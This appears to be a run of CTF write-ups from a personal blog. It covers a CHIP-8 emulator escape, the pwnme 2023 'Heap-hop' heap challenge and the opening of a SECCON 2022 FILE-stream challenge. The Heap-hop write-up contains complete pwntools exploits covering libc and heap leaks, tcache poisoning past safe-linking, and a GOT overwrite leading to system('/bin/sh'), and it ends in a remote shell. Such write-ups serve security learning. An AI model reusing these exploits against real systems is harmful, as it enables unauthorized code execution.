║ ▄██   ▀                                                        ║
║  █▄█▀ ▀                                                        ║
║ ▀▄█▀▀██                                                        ║
║ ▀▀ ▀▀ ▀                                                        ║

If we decode chars by hand (each byte is a line for which white is 1 and black zero), we get:

╔════════════════════════════════════════════════════════════════╗
║ █ █ ▄▄▄                                                        ║PW
║ █  ██▀▄                                                        ║NM
║ █▄▄▄▀▄█                                                        ║E{
║ █  ▄ ▀▀                                                        ║CH
║ ▄██   ▀                                                        ║18
║  █▄█▀ ▀                                                        ║-8
║ ▀▄█▀▀██                                                        ║_3
║ ▀▀ ▀▀ ▀                                                         m

If we repeat this step 4 times (by incrementing the value of V1), we finally managed to get the flag: PWNME{CH1p-8_3mu14t0r_1s_h4Ck4bl3_1n_2023_y34h}.

Full exploit

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn

BINARY = "wrapper"
LIBC = "/usr/lib/x86_64-linux-gnu/libc.so.6"
LD = "/lib64/ld-linux-x86-64.so.2"

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
pwn.context.terminal = ["tmux", "splitw", "-h"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8  = pwn.p8
u8  = pwn.u8

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
source ~/Downloads/pwndbg/gdbinit.py
'''.format(**locals())

pwn.context.endianness = 'big'

STEP=0

def exp():
    io = start()

    # every registers are zero-ed at the begin of the program
    code = [
        0xAFFF, # Annn - LD I, addr, I  = 0xfff
		0x6111 + 0xf*STEP, # 6xkk - LD Vx, byte, R1 = 0x1F
        0xF11E, # ADD I, R1, I => 0x101F
		0xDBCF  # Write on screen (xored with current pixels) 15 bytes from I
    ]

    code_to_send = [pwn.p16(k) for k in code]

    io.sendafter(b"Enter ROM code: ", b"".join(code_to_send))
    io.sendline(b"\n")
    io.sendline(b"\n")

    io.sendline(b"\n")

    io.interactive()

if __name__ == "__main__":
    exp()

"""
PWNME{CH1p-8_3mu14t0r_1s_h4Ck4bl3_1n_2023_y34h}
╔════════════════════════════════════════════════════════════════╗
║ █ █ ▄▄▄                                                        ║PW
║ █  ██▀▄                                                        ║NM
║ █▄▄▄▀▄█                                                        ║E{
║ █  ▄ ▀▀                                                        ║CH
║ ▄██   ▀                                                        ║18
║  █▄█▀ ▀                                                        ║-8
║ ▀▄█▀▀██                                                        ║_3
║ ▀▀ ▀▀ ▀                                                         m

second part
╔════════════════════════════════════════════════════════════════╗
║ ██▄▀█ █                                                        ║mu
║  ██ ▄ ▀                                                        ║14
║ ▀██ ▀                                                          ║t0
║ █▀█▄▄█▄                                                        ║r_
║ ▄██  ▄█                                                        ║1s
║ █▄▀█▀▀▀                                                        ║_h
║ ▄▀▀ ▀▄▄                                                        ║4C
║ ▀▀ ▀ ▀▀                                                        ║k

part three:
════════════════════════════════════════════════════════════════╗
║ ▄█▀ ▀▄                                                         ║4b
║ ▀█▄▀▀▄▄                                                        ║l3
║ ▀▄█▀▀▀█                                                        ║_1
║ █▀▄███▄                                                        ║n_
║  ██  ▀                                                         ║20
║  ██  █▄                                                        ║23
║ █▄██▀▀█                                                        ║_y
║  ▀▀  ▀▀                                                         3

part four

║ ▄█▀▄▀                                                          ║4h
║ ▀▀▀▀▀ ▀                                                        ║}


"""

[pwnme 2023 - pwn] Heap-hop

Sun, 07 May 2023 00:00:00 GMT

Heap-Hop

Solves: 31 Medium

Heap exploitation is cool, and the best is when no free is used. >Try to pwn the challenge and get the flag remotely.

Note:

You must spawn an instance to solve this challenge. You can connect to it with netcat: nc IP PORT

Author: Express#8049

Remote service at : nc 51.254.39.184 1336

Heap-hop is a heap exploitation challenge I did during the pwnme CTF. It involved classic tricks like tcache poisoning and GOT hiijacking. You can find the related files here.

TL;DR

Setup heap layout
fill tcachebin for 0x400 sized chunks
free large 0x400 sized chunk to get libc addresses
oob read onto the chunk right before the large freed chunk => libc leak
request a small 0x20 sized chunk that gets free right after, it falls at the begin of the chunk in the unsortedbin, oob read like just before => heap leak.
tcache poisoning (we're able to deal with safe-linking given we leaked heap)
With the help of tcache poisoning, overwrite realloc@got to write &system
realloc("/bin/sh") is then system("/binb/sh")

What we have

$ checksec --file ./heap-hop
[*] '/media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ret2school/ctf/2023/pwnme/pwn/heap/heap-hop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)
    RUNPATH:  b'/home/nasm/Documents/pwn/pwnme/heap'
$ ./libc.so.6 
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 11.2.0.
libc ABIs: UNIQUE IFUNC ABSOLUTE
For bug reporting instructions, please see:
<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.

What we can see is that a recent libc is provided (which means with safe-linking) and that the binary isn't PIE.

Code review

Here is basically the main logic of the binary:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int input_int; // [rsp+Ch] [rbp-4h]

  puts("[+] Welcome to hip-hop, you can create and listen to heap-hop music");
  do
  {
    printf("%s", "Make your choice :\n\t- 1. Create a track.\n\t- 2. Read a track.\n\t- 3. Edit a track.\n> ");
    input_int = read_input_int();
    if ( input_int == 3 )
    {
      handle_edit();
    }
    else
    {
      if ( input_int > 3 )
        goto LABEL_10;
      if ( input_int == 1 )
      {
        handle_create();
        continue;
      }
      if ( input_int == 2 )
        handle_read();
      else
LABEL_10:
        quit = 1;
    }
  }
  while ( quit != 1 );
  return puts("[?] Goodbye.");
}

Basic layout for a heap exploitation challenge, we're allowed to create, read and edit a given track. As we already read in the initial statement we apparently cannot free a track.

Let's first take a look at the create function:

unsigned __int64 handle_create()
{
  void *v0; // rdx
  unsigned int idx; // [rsp+Ch] [rbp-14h] BYREF
  chunk_t *buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v4; // [rsp+18h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  idx = 0;
  printf("Enter the tracklist ID\n> ");
  __isoc99_scanf("%d", &idx);
  if ( idx > 0x100 )
    _exit(1);
  if ( tracks[idx] )
  {
    puts("[!] track already exists.\n");
  }
  else
  {
    buf = (chunk_t *)malloc(0x30uLL);
    if ( !buf )
      _exit(1);
    printf("Enter the tracklist name\n> ");
    read(0, buf, 0x20uLL);
    printf("Enter the tracklist content length\n> ");
    __isoc99_scanf("%ld", &buf->size);
    if ( buf->size > 0x480uLL )
      _exit(1);
    v0 = malloc(buf->size);
    buf->track = (__int64)v0;
    if ( !buf->track )
      _exit(1);
    printf("Enter the tracklist content\n> ");
    if ( !read(0, (void *)buf->track, buf->size) )
      _exit(1);
    tracks[idx] = buf;
    puts("[+] track successfully created.\n");
  }
  return v4 - __readfsqword(0x28u);
}

It crafts a chunk, and then allocates a chunk for a given size (< 0x480). The read function is very basic:

unsigned __int64 handle_read()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  v1 = 0;
  printf("Enter the tracklist ID\n> ");
  __isoc99_scanf("%d", &v1);
  if ( v1 > 0x100 )
    _exit(1);
  if ( tracks[v1] )
  {
    puts("[+] track content :");
    write(1, (const void *)tracks[v1]->track, tracks[v1]->size);
    puts(&byte_4020FF);
  }
  else
  {
    puts("[!] track doesn't exist.\n");
  }
  return v2 - __readfsqword(0x28u);
}

It prints tracks[v1]->size bytes from tracks[v1]->track. Which means no need to worry about badchars for the leak.

The bug lies in the handle_edit function:

unsigned __int64 handle_edit()
{
  chunk_t *v0; // rbx
  unsigned int idx; // [rsp+Ch] [rbp-24h] BYREF
  size_t size; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v4; // [rsp+18h] [rbp-18h]

  v4 = __readfsqword(0x28u);
  idx = 0;
  size = 0LL;
  printf("Enter the tracklist ID\n> ");
  __isoc99_scanf("%d", &idx);
  if ( idx > 0x100 )
    _exit(1);
  if ( tracks[idx] )
  {
    printf("Enter the new tracklist content length\n> ");
    __isoc99_scanf("%ld", &size);
    if ( size > 0x480 )
      _exit(1);
    v0 = tracks[idx];
    v0->track = (__int64)realloc((void *)v0->track, size);
    printf("Enter the new tracklist content\n> ");
    read(0, (void *)tracks[idx]->track, tracks[idx]->size);
    puts("[+] track content edited.");
  }
  else
  {
    puts("[!] track doesn't exist.\n");
  }
  return v4 - __readfsqword(0x28u);
}

There are two bugs, or at least interesting behaviours around realloc. First there is an out of bound (oob) read / write, indeed if we give a size smaller than tracks[idx]->size, then v0->track could be changed to a smaller chunk and thus read(0, (void *)tracks[idx]->track, tracks[idx]->size); could write over the end of the chunk. Secondly we can free a chunk by giving zero to the size.

Exploitation

Given tcache poisoning seems to be pretty easy to achieve, we need to find where we could use our arbitrary write. If you remind well, the binary isn't PIE based and has only partial RELRO, which means we could easily hiijack the GOT entry of a function (like realloc) to replace it with system and then call realloc("/bin/sh"). This way we need to get a heap and a libc leak.

libc leak

To get a libc leak we can fill the tcache and free a large chunk to make appear libc addresses on the heap and then read it through the oob read. Which gives:

create(0, b"", 5, b"0")

# Step one, 7 chunks to fill tcache later
for i in range(7):
    create(1+i, b"", 0x400, str(i).encode())

# small chunk which will be used to the oob r/w
create(8+1, b"", 0x20, b"_")
# victim chunk
create(9+1, b"", 0x400, b"_")

# chunk with big size that will be used for the oob r/w
create(10+1, b"", 0x200, b"barreer")
create(10+2, b"", 0x20, b"barree2")

# fill tcache
for i in range(7):
    free(1+i)

# oob chunk 
free(8+1)

free(11) # we free in order that at the next edit it actually allocates a new chunk
edit(11, 0x20, b"_") # allocated in 9

free(9+1) # falls in the unsortedbin

read(11) # oob read
io.recv(0x70)
libc.address = pwn.unpack(io.recv(8)) - 0x219ce0

The heap looks like this:

0x1d83120       0x0000000000000000      0x0000000000000041      ........A.......        <= chunk used to get the oob r/w
0x1d83130       0x000000000000000a      0x0000000000000000      ................                                                                               
0x1d83140       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83150       0x0000000000000020      0x0000000000000000       ...............
0x1d83160       0x0000000000000000      0x0000000000000031      ........1.......        <= track buffer of the chunk used to get the oob r/w
0x1d83170       0x0000000000000a5f      0x0000000000000000      _...............                                                                               
0x1d83180       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83190       0x0000000000000000      0x0000000000000041      ........A.......        <= victim chunk, size: 0x400, its track field is fell into the unsortedbin
0x1d831a0       0x000000000000000a      0x0000000000000000      ................                                                                               
0x1d831b0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d831c0       0x0000000000000400      0x0000000000000000      ................                                                                               
0x1d831d0       0x0000000000000000      0x0000000000000411      ................        <-- unsortedbin[all][0]                                                
0x1d831e0       0x00007f0eb218dce0      0x00007f0eb218dce0      ................                                                                               
0x1d831f0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83200       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83210       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83220       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83230       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83240       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83250       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83260       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83270       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83280       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83290       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d832a0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d832b0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d832c0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d832d0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d832e0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d832f0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83300       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83310       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83320       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83330       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83340       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83350       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83360       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83370       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83380       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83390       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d833a0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d833b0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d833c0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d833d0       0x0000000000000000      0x0000000000000000      ................
0x1d833e0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d833f0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83400       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83410       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83420       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83430       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83440       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83450       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83460       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83470       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83480       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83490       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d834a0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d834b0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d834c0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d834d0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d834e0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d834f0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83500       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83510       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83520       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83530       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83540       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83550       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83560       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83570       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83580       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83590       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d835a0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d835b0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d835c0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d835d0       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d835e0       0x0000000000000410      0x0000000000000040      ........@.......        <= Freed chunk 11
0x1d835f0       0x000000000000000a      0x0000000000000000      ................                                                                               
0x1d83600       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83610       0x0000000000000200      0x0000000001d83170      ........p1......                                                                               
0x1d83620       0x0000000000000000      0x0000000000000211      ................                                                                               
0x1d83630       0x0000000000001d83      0x5b5e1382ca86a7f8      ..............^[        <-- tcachebins[0x210][0/1]                                             
0x1d83640       0x0000000000000000      0x0000000000000000      ................                                                                               
0x1d83650       0x0000000000000000      0x0000000000000000      ................                             
0x1d83660       0x0000000000000000      0x0000000000000000      ................                             
0x1d83670       0x0000000000000000      0x0000000000000000      ................                             
0x1d83680       0x0000000000000000      0x0000000000000000      ................                             
0x1d83690       0x0000000000000000      0x0000000000000000      ................                             
0x1d836a0       0x0000000000000000      0x0000000000000000      ................                             
0x1d836b0       0x0000000000000000      0x0000000000000000      ................                             
0x1d836c0       0x0000000000000000      0x0000000000000000      ................                             
0x1d836d0       0x0000000000000000      0x0000000000000000      ................                             
0x1d836e0       0x0000000000000000      0x0000000000000000      ................                             
0x1d836f0       0x0000000000000000      0x0000000000000000      ................                             
0x1d83700       0x0000000000000000      0x0000000000000000      ................                             
0x1d83710       0x0000000000000000      0x0000000000000000      ................                             
0x1d83720       0x0000000000000000      0x0000000000000000      ................                             
0x1d83730       0x0000000000000000      0x0000000000000000      ................                             
0x1d83740       0x0000000000000000      0x0000000000000000      ................                             
0x1d83750       0x0000000000000000      0x0000000000000000      ................                             
0x1d83760       0x0000000000000000      0x0000000000000000      ................                             
0x1d83770       0x0000000000000000      0x0000000000000000      ................                             
0x1d83780       0x0000000000000000      0x0000000000000000      ................                             
0x1d83790       0x0000000000000000      0x0000000000000000      ................                             
0x1d837a0       0x0000000000000000      0x0000000000000000      ................                             
0x1d837b0       0x0000000000000000      0x0000000000000000      ................                             
0x1d837c0       0x0000000000000000      0x0000000000000000      ................                             
0x1d837d0       0x0000000000000000      0x0000000000000000      ................                             
0x1d837e0       0x0000000000000000      0x0000000000000000      ................                             
0x1d837f0       0x0000000000000000      0x0000000000000000      ................                             
0x1d83800       0x0000000000000000      0x0000000000000000      ................                             
0x1d83810       0x0000000000000000      0x0000000000000000      ................                             
0x1d83820       0x0000000000000000      0x0000000000000000      ................                             
0x1d83830       0x0000000000000000      0x0000000000000041      ........A.......        <= last small chunk, barreer               
0x1d83840       0x000000000000000a      0x0000000000000000      ................                             
0x1d83850       0x0000000000000000      0x0000000000000000      ................                             
0x1d83860       0x0000000000000020      0x0000000001d83880       ........8......                             
0x1d83870       0x0000000000000000      0x0000000000000031      ........1.......                             
0x1d83880       0x00000000000a3233      0x0000000000000000      32..............                             
0x1d83890       0x0000000000000000      0x0000000000000000      ................                             
0x1d838a0       0x0000000000000000      0x000000000001e761      ........a.......        <-- Top chunk

I advice you to take a look at the heap layout if you do not understand the exploit script.

Heap leak

Now we got a libc leak we're looking for a heap leak, it is basically the same thing as above, but instead of freeing a large chunk, we free a small 0x20 sized chunk. To understand the defeat of safe-linking I advice you to read this. Which gives:

# leak heap to craft pointers
edit(1, 0x10, b"osef") # split unsortedbin chunk
free(1) # tcache 0x20

read(11) # oob read
io.recv(0x70)
heap = (pwn.unpack(io.recv(8)) << 12) - 0x2000 # leak fp of 1
pwn.log.info(f"heap: {hex(heap)}")

tcache poisoning

To achieve tcache poisoning we just need to get the 0x20 sized chunk right after the out of bound chunk. Then we free it and we use the out of bound chunk to overwrite the forward pointer of the victim chunk to &realloc@GOT. Given we leaked the heap we can easily bypass the safe-linking protection.

#== tcache poisoning

# get the 0x20 sized chunk that is right after the oob chunk
edit(10, 10, b"osef")

free(0)

# tcache 0x20, count = 2, tcache poisoning is basically 10->fp = target
free(10) 

# oob write to set 10->fp = &realloc@got-8 (due to alignment issues)
edit(11, 0x20, b"Y" * 0x60 + pwn.p64(0) + pwn.p64(0x31) + pwn.p64(((heap + 0x21f0) >> 12) ^ (exe.got.realloc - 8))) 

edit(3, 10, pwn.p64(libc.address + one_gadget("./libc.so.6")[0])) # useless
edit(12, 10, b"/bin/sh\0") # 12 => b"/binb/sh\0"

# given we falls on &realloc@got-8, we overwrite got entries correctly 
edit(4, 10, pwn.p64(libc.sym.malloc) + pwn.p64(libc.sym.system) + pwn.p64(libc.sym.scanf))

PROFIT

Then we just have to do:

# edit => realloc("/bin/sh") => system("/bin/sh")
io.sendlineafter(b"> ", b"3")
io.sendlineafter(b"> ", str(12).encode())
io.sendlineafter(b"> ", str(10).encode())

io.interactive()

Which gives:

nasm@off:~/Documents/pwn/pwnme/heap$ python3 exploit.py REMOTE HOST=51.254.39.184 PORT=1336
[*] '/home/nasm/Documents/pwn/pwnme/heap/heap-hop'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)
    RUNPATH:  b'/home/nasm/Documents/pwn/pwnme/heap'
[*] '/home/nasm/Documents/pwn/pwnme/heap/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/nasm/Documents/pwn/pwnme/heap/ld-linux-x86-64.so.2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 51.254.39.184 on port 1336: Done
[*] libc: 0x7faf9a27f000
[*] heap: 0x191d000
[*] one_gadget: 0x7faf9a36acf8 @ 0x404050
[*] Switching to interactive mode
$ id
uid=1000(player) gid=999(ctf) groups=999(ctf)
$ ls
flag.txt
run
$ cat flag.txt
PWNME{d1d_y0u_kn0w_r341l0c_c4n_b3h4v3_l1k3_th4t}

Final exploit

Here is the final exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn

BINARY = "heap-hop"
LIBC = "/home/nasm/Documents/pwn/pwnme/heap/libc.so.6"
LD = "/home/nasm/Documents/pwn/pwnme/heap/ld-linux-x86-64.so.2"

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
pwn.context.terminal = ["tmux", "splitw", "-h"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8  = pwn.p8
u8  = pwn.u8

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

import subprocess
def one_gadget(filename):
  return [int(i) for i in subprocess.check_output(['one_gadget', '--raw', filename]).decode().split(' ')]

gdbscript = '''
source ~/Downloads/pwndbg/gdbinit.py
'''.format(**locals())

def exp():

    io = start()

    def create(idx, name, trackLen, trackContent):
        io.sendlineafter(b"> ", b"1")
        io.sendlineafter(b"> ", str(idx).encode())
        io.sendlineafter(b"> ", name)
        io.sendlineafter(b"> ", str(trackLen).encode())
        io.sendlineafter(b"> ", str(trackLen).encode())

    def read(idx):
        io.sendlineafter(b"> ", b"2")
        io.sendlineafter(b"> ", str(idx).encode())
        io.recvuntil(b"[+] track content :\n")

    def edit(idx, newLength, trackContent):
        io.sendlineafter(b"> ", b"3")
        io.sendlineafter(b"> ", str(idx).encode())
        io.sendlineafter(b"> ", str(newLength).encode())
        io.sendlineafter(b"> ", trackContent)

    def free(idx):
        io.sendlineafter(b"> ", b"3")
        io.sendlineafter(b"> ", str(idx).encode())
        io.sendlineafter(b"> ", str(0).encode())
        io.sendlineafter(b"> ", b"")

    create(0, b"", 5, b"0")
    
    # Step one, 7 chunks to fill tcache later
    for i in range(7):
        create(1+i, b"", 0x400, str(i).encode())

    # small chunk which will be used to the oob r/w
    create(8+1, b"", 0x20, b"_")
    # victim chunk
    create(9+1, b"", 0x400, b"_")

    # chunk with big size that will be used for the oob r/w
    create(10+1, b"", 0x200, b"barreer")
    create(10+2, b"", 0x20, b"barree2")

    # fill tcache
    for i in range(7):
        free(1+i)

    # oob chunk 
    free(8+1)
    
    free(11)
    edit(11, 0x20, b"_") # allocated in 9
    
    free(9+1) # falls in the unsortedbin

    read(11) # oob read
    io.recv(0x70)
    libc.address = pwn.unpack(io.recv(8)) - 0x219ce0
    pwn.log.info(f"libc: {hex(libc.address)}") # leak libc

    # leak heap to craft pointers
    edit(1, 0x10, b"osef") # split unsortedbin chunk
    free(1) # tcache 0x20

    read(11) # oob read
    io.recv(0x70)
    heap = (pwn.unpack(io.recv(8)) << 12) - 0x2000
    pwn.log.info(f"heap: {hex(heap)}")

    #== tcache poisoning
 
    # get the 0x20 sized chunk that is right after the oob chunk
    edit(10, 10, b"osef")

    free(0)

    # tcache 0x20, count = 2, tcache poisoning is basically 10->fp = target
    free(10) 

    # oob write to set 10->fp = &realloc@got-8 (due to alignment issues)
    edit(11, 0x20, b"Y" * 0x60 + pwn.p64(0) + pwn.p64(0x31) + pwn.p64(((heap + 0x21f0) >> 12) ^ (exe.got.realloc - 8))) 

    edit(3, 10, pwn.p64(libc.address + one_gadget("./libc.so.6")[0])) # useless
    edit(12, 10, b"/bin/sh\0") # 12 => b"/binb/sh\0"

    # given we falls on &realloc@got-8, we overwrite got entries correctly 
    edit(4, 10, pwn.p64(libc.sym.malloc) + pwn.p64(libc.sym.system) + pwn.p64(libc.sym.scanf))


    # edit => realloc("/bin/sh") => system("/bin/sh")
    io.sendlineafter(b"> ", b"3")
    io.sendlineafter(b"> ", str(12).encode())
    io.sendlineafter(b"> ", str(10).encode())

    io.interactive()

if __name__ == "__main__":
    exp()

[SECCON CTF 2022 Quals] babyfile

Fri, 19 Aug 2022 00:00:00 GMT

Introduction

babyfile is a file stream exploitation I did during the SECCON CTF 2022 Quals event. I didn’t succeed to flag it within the 24 hours :(. But anyway I hope this write up will be interesting to read given I show another way to gain code execution -- I have not seen before -- based on _IO_obstack_jumps! The related files can be found here. If you're not familiar with file stream internals, I advice you to read my previous writeups about file stream exploitation, especially this one and this other one.

TL;DR

Populate base buffer with heap addresses with the help of _IO_file_doallocate.
Make both input and output buffer equal to the base buffer with the help of _IO_file_underflow.
Partial overwrite on right pointers to get a libc leak by simply flushing the file stream.
Leak a heap address by printing a pointer stored within the main_arena.
_IO_obstack_overflow ends up calling a function pointer stored within the file stream we have control over which leads to a call primitive (plus control over the first argument). Then I just called system("/bin/sh\x00").

What we have

The challenge is basically opening /dev/null, asking for an offset and a value to write at fp + offset. And we can freely flush fp. The source code is prodided:

Source code:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static int menu(void);
static int getnline(char *buf, int size);
static int getint(void);

#define write_str(s) write(STDOUT_FILENO, s, sizeof(s)-1)

int main(void){
	FILE *fp;

	alarm(30);

	write_str("Play with FILE structure\n");

	if(!(fp = fopen("/dev/null", "r"))){
		write_str("Open error");
		return -1;
	}
	fp->_wide_data = NULL;

	for(;;){
		switch(menu()){
			case 0:
				goto END;
			case 1:
				fflush(fp);
				break;
			case 2:
				{
					unsigned char ofs;
					write_str("offset: ");
					if((ofs = getint()) & 0x80)
						ofs |= 0x40;
					write_str("value: ");
					((char*)fp)[ofs] = getint();
				}
				break;
		}
		write_str("Done.\n");
	}

END:
	write_str("Bye!");
	_exit(0);
}

static int menu(void){
	write_str("\nMENU\n"
			"1. Flush\n"
			"2. Trick\n"
			"0. Exit\n"
			"> ");

	return getint();
}

static int getnline(char *buf, int size){
	int len;

	if(size <= 0 || (len = read(STDIN_FILENO, buf, size-1)) <= 0)
		return -1;

	if(buf[len-1]=='\n')
		len--;
	buf[len] = '\0';

	return len;
}

static int getint(void){
	char buf[0x10] = {};

	getnline(buf, sizeof(buf));
	return atoi(buf);
}

Exploitation ideas

I tried (in this order) to:

Get a libc leak by calling _IO_file_underflow to make input and output buffers equal to the base buffer that contains with the help of _IO_file_doallocate a heap address. And then flushing the file stream to leak the libc.
Get a heap leak by leaking a heap pointer stored within the main_arena.
Get an arbitrary write with a tcache dup technique, I got __free_hook as the last pointer available in the target tcache bin but I didn't succeeded to get a shell >.<.
Call primitive with control over the first argument by calling _IO_obstack_overflow (part of the _IO_obstack_jumps vtable). Then it allows us to call system("/bin/sh\x00").

Libc leak

To get a libc leak we have to write on stdout a certain amount of bytes that leak a libc address. To do so we're looking for a way to make interesting pointers appear as the base buffer to then initialize both input and output buffer to the base buffer and then do a partial overwrite on these fields to point to an area that contains libc pointers. To get heap addresses within the base buffer we can misalign the vtable in such a way that fp->vtable->sync() calls _IO_default_doallocate. Then _IO_default_doallocate is called and does some operations:

The initial state of the file stream looks like this:

0x559c0955e2a0: 0x00000000fbad2488      0x0000000000000000
0x559c0955e2b0: 0x0000000000000000      0x0000000000000000
0x559c0955e2c0: 0x0000000000000000      0x0000000000000000
0x559c0955e2d0: 0x0000000000000000      0x0000000000000000
0x559c0955e2e0: 0x0000000000000000      0x0000000000000000
0x559c0955e2f0: 0x0000000000000000      0x0000000000000000
